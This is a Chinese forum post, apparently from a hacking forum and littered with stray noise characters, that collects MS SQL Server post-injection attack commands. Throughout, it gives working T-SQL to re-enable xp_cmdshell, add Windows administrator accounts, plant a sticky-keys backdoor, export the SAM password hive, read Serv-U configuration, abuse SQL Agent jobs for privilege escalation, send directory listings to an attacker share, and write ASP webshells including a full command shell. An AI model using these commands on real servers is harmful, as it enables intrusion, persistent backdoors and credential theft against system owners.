1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号* @( t' F, N6 A+ X2 Q
恢复方法:查询分离器连接后,
) T" Z0 _: V T+ k9 N5 f; T6 A第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
: d, z7 b% N3 P- z$ E- h第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 p: g9 x4 f, g3 Y" _8 v+ n( `4 Q* O. J然后按F5键命令执行完毕# Q4 e! L3 X8 O4 ]3 H& L5 H4 F* w
0 Z% h2 C0 e8 g: W2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)( W* m# U+ g4 S' D
恢复方法:查询分离器连接后,
7 F P0 x: g/ P; F9 A: N第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"/ n' K/ _; a/ T: ^/ M6 ?5 g
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- I+ F3 ~5 p1 f9 V然后按F5键命令执行完毕0 U+ S' M1 n, `. i
% X7 z* h* l3 G6 c! |& A
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
; r" ^5 C9 o% y5 U9 w( p8 y恢复方法:查询分离器连接后,& a1 _1 `. k6 q% U$ \% ?3 n
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. F4 y: a) p) N) {4 T
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
3 W* \, O0 w. N, ~% K% c然后按F5键命令执行完毕
6 s" L0 S; A' n1 M2 V- P8 |- g7 y1 w) h( d, o' K3 b
4 终极方法.
( u8 Z4 ]8 S( n: K( S( Y如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:. I1 B$ d5 N& C) G& F/ R
查询分离器连接后,7 W m) j% r% z3 u
2000servser系统:, R9 ~4 t" I3 L. m* B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add' Q6 R1 r! T! e2 Q
' c" h$ O: ], b1 Q p4 Cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'3 ~. X ^% v3 a6 l# a! a( i0 C
5 C E9 C9 ~/ S* a0 y2 @xp或2003server系统:
9 p' W% J, N9 Y1 L- k5 v/ s* }& h4 W
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3 b& v, d$ S% c7 ^. F( ?+ i1 r- g/ f6 |' v2 F
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'6 H' Q0 P1 m6 x
6 k7 c" F3 O6 e- {8 Q6 K
2 h; Y' c6 | K4 h ]; `3 X
五个SHIFT
' V' @2 H* B4 U" q9 ?declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
% i! L9 ^: }% q
" T$ d q3 W4 V- f2 ddeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; V9 g! Z! `1 T% @! _ C
, x2 E+ i% t& A/ n6 yxp_cmdshell执行命令另一种方法6 _$ F8 ?- O6 I7 d
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
2 s# {; _1 p, G3 Y+ P
4 ^+ ~& z+ R- p- N判断存储扩展是否存在4 d7 j' _2 ?5 T6 O8 c
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
" M; I8 K* t: I0 N返回结果为1就OK+ q( h: v M% q
9 b+ {% ^) N. f) L% {' r3 @3 D* `, I' @: n
上传xplog70.dll恢复xp_cmdshell语句:
$ l9 L" B$ H, i* ~7 z, ^sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
. y- y: i) O+ [7 i+ j- \! h% s* w+ Y- `3 ^+ I( G
否则上传xplog7.0.dll: @% @- w% r. N! b* i. A0 {
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
' w$ z( k! f# o% M& B* F! I) F$ M: ]* t+ {& v
9 b1 y$ ^, u6 r9 j7 R: q3 p- E. F. U, D8 T# o% r% ~5 L! {9 `
首先开启沙盘模式:/ S3 T0 q* o+ l; [1 o& m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',15 h7 L Q: T2 l: P7 k3 I
" Q1 @9 k4 {" |6 |然后利用jet.oledb执行系统命令
6 g+ o. }3 m) n! T6 b5 qselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')0 {0 @& t- b; L5 v0 s+ h4 f( u3 n
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了 @9 {' e$ E8 a4 Z* N, f& Y( T" q
* R* V! d( E8 f- e% q$ P) s: R$ V9 A* o1 ~2 {, ?
2 K! z- O( T* E: b: y, y7 D H/ M8 _恢复过程sp_addextendedproc 如下:
* s3 k$ V+ {' u. ^( P. pcreate procedure sp_addextendedproc --- 1996/08/30 20:13 ' q. ~8 v+ p3 j5 f8 u9 a2 E* V1 p
@functname nvarchar(517),/* (owner.)name of function to call */
8 E: r1 `$ G! R1 ^; K8 L, J1 x@dllname varchar(255)/* name of DLL containing function */ 9 L" s) A& `. Y
as
4 H$ H1 U% |( a. \/ f" z5 C& G* \set implicit_transactions off
: d5 y' f6 q' \& `. s$ u8 u; Bif @@trancount > 0
7 N5 E1 B$ ]8 ~8 Mbegin + M; {& u. T [9 M8 x
raiserror(15002,-1,-1,'sp_addextendedproc') - |4 D0 L1 k# T+ B
return (1)
, H0 t, u7 ~5 [6 Send
" ?( `! K5 k- E8 M( t; fdbcc addextendedproc( @functname, @dllname)
8 ^* h, t+ J& R' mreturn (0) -- sp_addextendedproc p5 w. X) Z( K$ C0 \+ o1 F' R
GO 1 C. v' [- w' h+ s/ w, Y
" [; g* `# I# @; n" t" u) n6 W6 o8 o
& n% b# N6 ?- r( M. z7 P% h5 b% M% [7 e% L% x7 d/ t
导出管理员密码文件
2 x6 ?7 D' C, T' R1 L7 [sa默认可以读sam键.应该。: ^/ ]+ q: ]6 I: S' B& u) H
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg2 K& M+ G9 _# ~; m! `
net user administrator test* p) r% o4 k! W, p
用administrator登陆.
& i N2 | R* B3 F6 m5 |; m; f: Y4 ^( p用完机器后
2 E3 I+ e- S! U4 `8 treg import c:\test.reg
2 j- ^8 x; I* J* v根本不用克隆.+ Q8 k# m! H) ^
找到对应的sid.
1 z/ z5 Y- |3 F6 ^2 o. y- _& J8 x3 r+ a Z
* v( [" e, Y* R# X- x3 D, X
3 A0 g1 K2 Z+ n# z
恢复所有存储过程6 G" w0 L. t# C$ W1 z
use master
6 ~# R6 D( @9 n bexec sp_addextendedproc xp_enumgroups,'xplog70.dll' ) J1 ?1 n8 q, @- P. U# m/ f* o
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 1 w+ j" y$ Z' C
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
, q9 M# f) j2 H' K+ |7 Wexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' " z; h* Z( K% l) [7 z% \' L
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
' z& R3 p$ A9 cexec sp_addextendedproc sp_OACreate,'odsole70.dll' " s( k( `3 F# U8 G! j; Q+ E- ~
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' . a% t; E! ?+ u. x
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
+ k! q, @& \! o4 W4 X$ y- V# Wexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' : t5 a. @5 v% n7 E# P# m, O9 r
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' / h; R- @' Z8 Y4 M; l0 P
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ! y- T3 k6 k! I
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
8 j4 y3 N+ b6 e6 }- qexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
- P) P7 j# b7 r9 c6 c4 p' lexec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
( D, {% p) X+ b+ V, Oexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' % M U, g% A# y$ U+ I
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
/ ?2 ?+ N* ?6 W2 ~exec sp_addextendedproc xp_regread,'xpstar.dll' " i n0 G S5 u7 {
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' % ]" o: E' q* y$ ^5 z. ~7 x) h1 z
exec sp_addextendedproc xp_regwrite,'xpstar.dll' ) l- P" A& w2 Q! o0 F3 x: d
exec sp_addextendedproc xp_availablemedia,'xpstar.dll', [, q$ z( d+ @' @9 |3 Y/ x9 h
* r$ u @3 A, X8 K+ P( P2 a: q3 B9 C- D% [
建立读文件的存储过程0 k% X' n: y. Y; F( V; x
Create proc sp_readTextFile @filename sysname
) A3 y+ s- R! c+ P/ [' D, mas
5 b7 M+ }: }( p' R. Q
6 m+ E* o! B6 w$ c3 u2 k0 C begin
; R5 d$ z! }0 g set nocount on
; G! K) A/ O, r1 K Create table #tempfile (line varchar(8000)). d6 H! [; p# d
exec ('bulk insert #tempfile from "' + @filename + '"')0 v A% f, g* M9 g7 a5 d0 m; ~# @
select * from #tempfile$ W. X: N) g( r i
drop table #tempfile$ f/ ~) L6 Q& F8 \' |
End/ O, Y1 _3 c% w m( a f
$ x1 R" f9 k$ A1 [% \
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件" e9 C: f _0 A9 Q0 C0 {! a, _7 Y4 a4 G
查看登录用户
8 O) M7 v5 v5 B4 u3 w7 t2 F aSelect * from sysxlogins
) u5 c7 j. O# N: [
c9 v( _1 Z% K3 I$ q把文件内容读取到表中. B& R' F6 J4 R/ B* L0 h4 v5 V+ I
BULK INSERT tmp from "c:\test.txt"
' j* `1 `/ O# [5 k+ h/ x% XdElete from 表名 清理表里的内容. f8 E5 N; w% x
create table b_test(fn nvarchar(4000));建一个表,字段为fn A2 R# w- H+ @; V+ Q" \
- d k1 B% C+ |9 K0 U/ Q
3 ]: F6 A" u$ F3 H加sa用户
1 F o t4 G2 E- J" N6 [8 Lexec master.dbo.sp_addlogin user,pass;
3 f1 {7 Y( f% l Q/ [exec master.dbo.sp_addsrvrolemember user,sysadmin
( p' R8 v T& l! H
7 U2 }' K; X! O# Q# Q# t4 O* m# ^4 j0 N
9 A# p$ C: _/ w* U" O& }% T
读文件代码# w! R1 i: \, F9 Y; ?
declare @o int, @f int, @t int, @ret int
* Y9 s; n9 M, Y, z: }0 R8 i6 adeclare @line varchar(8000)
$ y! Y+ Y/ F( Z5 U# W: D9 iexec sp_oacreate 'scripting.filesystemobject', @o out
) W' X3 s9 [( l! iexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
7 a+ K+ ~1 d: o; Bexec @ret = sp_oamethod @f, 'readline', @line out6 B8 @; j) ^+ O! t) ]
while( @ret = 0 )0 Y6 L# Q1 m" i( [
begin4 @( K" ~' l$ x! c v' b
print @line
1 y4 j8 M& P" cexec @ret = sp_oamethod @f, 'readline', @line out
. `) u, [' k8 u! S( f% uend
9 e3 B" j# b( N7 m9 Q) j" f8 \$ ]2 I, l( o
: b% a+ F9 W& w) u' h: p' Y
写文件代码:! k; m) U/ C1 q' i, R, S0 v
declare @o int, @f int, @t int, @ret int
7 i, ~, t0 ]; L' Q) T7 Cexec sp_oacreate 'scripting.filesystemobject', @o out
/ L0 ?8 s( t7 `; oexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1/ a5 y! c! ^9 V' G% B6 ]8 H
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》: Y, }6 k! b" h' `6 h0 E
! }; ^6 }3 P5 q! F( M) b- \8 w
添加lake2 shell
9 T$ }' B( t$ s, \& nsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
4 z5 |" ]2 O, j# `7 |' y7 Ysp_dropextendedproc xp_lake22 c0 Z: j/ J( o1 x
EXEC xp_lake2 'net user' Z' n y2 Q$ n/ _4 d
8 P" C! U& p& i! J
, i) k9 I% M0 M) {- ~# k) e
得到硬盘文件信息
8 [$ w3 P! c1 N& `2 ?2 V& ~ V--参数说明:目录名,目录深度,是否显示文件 9 s# k+ a3 L" |
execute master..xp_dirtree 'c:'
7 J$ U& {; ]& Z& L- S wexecute master..xp_dirtree 'c:',1
7 q7 M! t6 y sexecute master..xp_dirtree 'c:',1,1
, J" E! E* q6 B
4 N" W9 e, Q+ h& w# ?" j( F
& N9 P: S# T- p3 L' [读serv-u配置信息
9 f {( v7 [3 j9 wexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'0 x; x, G9 W `1 @3 ~& M* p- [
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'/ o7 |$ u0 C. m9 p1 u
% ?! o0 \- I" h4 a3 K
通过xp_regwrite写SHIFT后门, T h1 y: u" Y0 a3 p, o2 L
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--: H& ^5 `9 S" t9 S8 Y8 f
5 r, W# Z5 ?- n, S t- M- Q2 h% o
: d% Y4 ^7 o1 w
$ _" Q# o3 k( ?, D! k, ?, |
找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
1 D, _8 {0 b* s+ s3 lexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
# R0 H0 v2 A! d* L2 C# ]8 t7 ?$ ^4 U7 j" I; \4 w4 i3 Q! }3 A
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'. {# k. b9 Z) z' [. _
2 z$ g8 R. p# y' ~
' x) H( K Q% [2 d9 l$ @
1 K' _2 f, h) p+ W$ c; i( }sql server 2005下开启xp_cmdshell的办法
- h7 T& V8 n% J7 k& m( w
! m& [% x: n2 X! KEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
$ H8 k: k2 m0 M. f/ n' h% n5 q2 I* ?* F$ ^; `5 N
SQL2005开启'OPENROWSET'支持的方法:
' I1 k4 s1 R- f; _+ }% O( T( x" v) g$ |, ^) L
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
1 e% T! Q6 e4 {8 r
8 n6 E" p2 d# ?& [: j" pSQL2005开启'sp_oacreate'支持的方法:' U, M" i* F% }( v' h9 v# w
9 C- W: l, p$ a$ U8 u
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;: S- k) D* B: v; s
5 R+ X9 I4 t+ \' G) }9 P) ^
3 f6 y8 H7 M8 u6 g$ i
9 W. i( _( {8 {: B( q$ ]' } p3 Y0 T* {
' w. J. \ B+ y. ^
8 m4 |0 \( |4 C; x5 f. n' j
* |8 T( l7 W) M1 r! b
9 s8 c2 v1 ~- H2 C. {8 L! v
8 n1 p. F6 Y; ~& G& _ k M- z1 ]) M, ^% A2 Z0 x: d: @
6 o& S5 [7 c4 e Q9 l8 W& g) I
' Y% g9 a0 Q5 I6 o6 K, s: R! q: B$ k1 d: _8 p/ J
: o6 t( ]+ O2 h
2 _% P. x+ Q# h# f
* k4 U: ?4 D7 f1 p0 D9 c" h+ D, C4 j6 y! Q7 f h" R, Q
: T# S8 \' n" C% b4 s' {" \( Z# k5 M& \) k
0 G: t( B. q' s
) `% c. l6 Q* o$ O5 U. a8 q# X# X, R' F# @: h: j7 M
, X/ U& ]( T" H3 h% m7 w6 U1 m
1 h' d% `2 g; }/ F$ W1 ]以下方面不知道能不能成功暂且留下研究哈:
* a9 P: y3 o2 z4)0 `/ D5 y; v$ @$ {# F- J
use msdb; --这儿不要是master哟
$ z- V. j: b8 D0 u" Q8 m, Qexec sp_add_job @job_name= czy82 ;
% s7 g# b* T% G3 i5 [1 Z: aexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;3 X# K9 |1 y) [' U, M5 Z4 p2 h
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
( ~1 j4 N0 `$ v$ jexec sp_start_job @job_name= czy82 ;
2 ?5 W& e' m' A" X! C1 k+ K6 v2 s, p5 [3 k
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以
& k& M- U" L) z! W3 c8 f2 \1 D% z执行tsql语句了.
, T8 b4 Z7 W# \对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
0 z. i) \' J2 e1 f/ o3 O7 f第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
! E2 ?( }+ A: B# A0 X, J. m& ]3 Y' Pnet start SQLSERVERAGENT( o# w$ w3 H4 s0 A2 G
0 I/ ]4 M! y, i) q
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
) \+ |. W% V: r5 Z; M8 U# bUSE msdb
" M& Y8 R. O6 U$ a+ Z$ SEXEC sp_add_job @job_name = GetSystemOnSQL ,7 B @! z0 J) w8 I$ P" {
@enabled = 1,5 s- }4 t- }2 T6 p
@description = This will give a low privileged user access to
# n1 d" X6 z$ R$ {* Vxp_cmdshell ,
/ t% Z% U9 m [@delete_level = 1/ e V6 L- k! G2 k% V
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
+ @' L9 `& l6 E9 O# H1 e@step_name = Exec my sql ,7 a4 G; `5 w* ] N& V" t+ n
@subsystem = TSQL ,5 F$ J7 f, e0 c: u7 l) b6 I& j
@command = exec master..xp_execresultset N select exec
5 Y. Z5 f8 z4 A" }9 w2 v& Mmaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master }' y6 q2 x. v3 ?4 \
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
6 z+ v# d: F m6 ~@server_name = 你的SQL的服务器名
7 e H2 I4 T7 I# o/ `) e7 f6 ^EXEC sp_start_job @job_name = GetSystemOnSQL " G1 {5 A+ |9 q1 _
; Q" o6 p2 g( y1 Z3 F8 p5 ?! {7 l不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
6 Y+ a. W( {( |. ^4 W7 v4 T才让我们可以以public执行xp_cmdshell
8 L0 z0 V1 _: Z% Q$ X, m' h5 f# S7 b8 `3 L
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)# Z0 A9 h d/ F1 ^
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968, g' K5 s: ]* C7 f! p5 m
1 ]$ J& Y/ ~3 C
USE msdb
+ [, V9 J: i6 M: c; E; EEXEC sp_add_job @job_name = ArbitraryFilecreate ,0 l) i- ^7 ~ ~6 `
@enabled = 1,
- A; i% M) p/ K( K( B. @@description = This will create a file called c:\sqlafc123.txt ,! i( _9 Q$ w+ N o
@delete_level = 1: f5 Q( T5 h* Q+ `* M9 Q
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,/ y1 K \0 U# Y6 E' L& C% N5 x/ T% j
@step_name = SQLAFC ,9 D8 C* M& {$ O" c; N0 \5 P
@subsystem = TSQL ,$ ~- P- c- G4 e
@command = select hello, this file was created by the SQL Agent. ,
6 I5 y/ g4 D2 E4 @@output_file_name = c:\sqlafc123.txt
' @+ K9 p- I7 V7 sEXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
) o6 h. L& _% x& C; d5 W9 t@server_name = SERVER_NAME A" u g9 T2 A% Z6 { e
EXEC sp_start_job @job_name = ArbitraryFilecreate 0 q: M( q1 n, Y* z6 g* b/ i' a
) {/ Y; N; u) P1 }如果subsystem选的是:tsql,在生成的文件的头部有如下内容% ~0 [8 B9 ~9 Z
; e. ^5 ]( Y% d" g% m$ j# s??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19$ J; y: r% i8 p# S9 }' d% T
----------------------------------------------
, [* `% r. f2 e, _& W; O. |3 ^hello, this file was created by the SQL Agent.6 o" E' H7 z! s4 r5 w2 x
0 n4 M! k# n0 r8 W' @ z. @7 A(1 ?????), ]* Y" L6 x# x# D! Y+ S f
: G6 K! L1 W! n" m" k# |所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
; ~# l. X" O6 p0 n& M$ { b9 p命令的vbs文件到启动目录!7 `8 Y3 C0 ?2 }0 s: a- @
' E% A% `( a4 ?& P4 | ~4 ?
6)关于sp_makewebtask(可以写任意内容任意文件名的文件) K3 f. g- T! E! v6 o
关于sp_MScopyscriptfile 看下面的例子+ n3 @& M( N g+ {3 E; Q# D5 L6 h
declare @command varchar(100)
+ n9 ^, j6 l2 n7 Pdeclare @scripfile varchar(200) " W) ~5 ^6 s( D& N, F& Q. ]
set concat_null_yields_null off 4 D; P8 K# M' Z( D: J. k/ `
select @command= dir c:\ > "\\attackerip\share\dir.txt"
! g. c9 | ]6 o* K( K" {, Lselect @scripfile= c:\autoexec.bat > nul" | @command | rd "
; ^0 C* v8 V; C- f6 Q, texec sp_MScopyscriptfile @scripfile , * X3 C8 l7 s: \7 c9 O
* `/ \6 N1 A! i5 t这两个东东都还在测试试哟$ Y4 R% x) _( A7 k# b4 J
让MSSQL的public用户得到一个本机的web shell
7 R. C6 `; v- ]6 |/ b2 K( l' z) j A6 \7 b8 @
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
* B, t: r5 F9 {' D--@query= select <img src=vbscript:msgbox(now())>
! l* ]( b, G: K: @3 i$ X--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> ) l6 Z0 z/ }4 N% e0 R
@query= select " D0 [2 _) G Q* ]* s, J
<%On Error Resume Next
( m( a9 D2 ]2 NSet oscript = Server.createObject("wscript.SHELL") 1 {3 j# B) F2 O; n8 {
Set oscriptNet = Server.createObject("wscript.NETWORK")
% Y) i" z/ \9 f5 q/ OSet oFileSys = Server.createObject("scripting.FileSystemObject")
& h a T% c- B) H( {szCMD = Request.Form(".CMD")
* U1 `8 V B3 A- \If (szCMD <>"")Then
9 t* u' X' A% v7 V' K+ MszTempFile = "C:\" & oFileSys.GetTempName()
/ k& D; b0 K( O0 ^9 C x: Q8 YCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) $ f) w9 [2 v7 W7 _
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ! O1 B+ U/ u: Y8 G4 F$ y
End If %>
/ |* [* \9 S: m. n8 v; \8 j<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
, h9 o( c! A# V; I2 {8 P7 E<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> ; c' p) p' Q1 u" K; b5 }% T
</FORM><RE> % z; D% v) m' y3 W7 G% W
<% If (IsObject(oFile))Then 0 t# E3 c; n+ y$ E
On Error Resume Next 4 C! z4 y( \/ M6 I; c9 z
Response.Write Server.HTMLEncode(oFile.ReadAll) 3 b6 t3 @7 E0 H& a
oFile.Close ; p/ Y" H* |* B* d9 F6 a* e
Call oFileSys.deleteFile(szTempFile, True) " K8 y9 s' x7 z
End If%>
" m. g, [, s4 M% ]' n$ | ~</BODY></HTML> 7 ?, R; m5 r& O- L" e
|
发表于 2012-9-15 14:37:30
收藏
支持
反对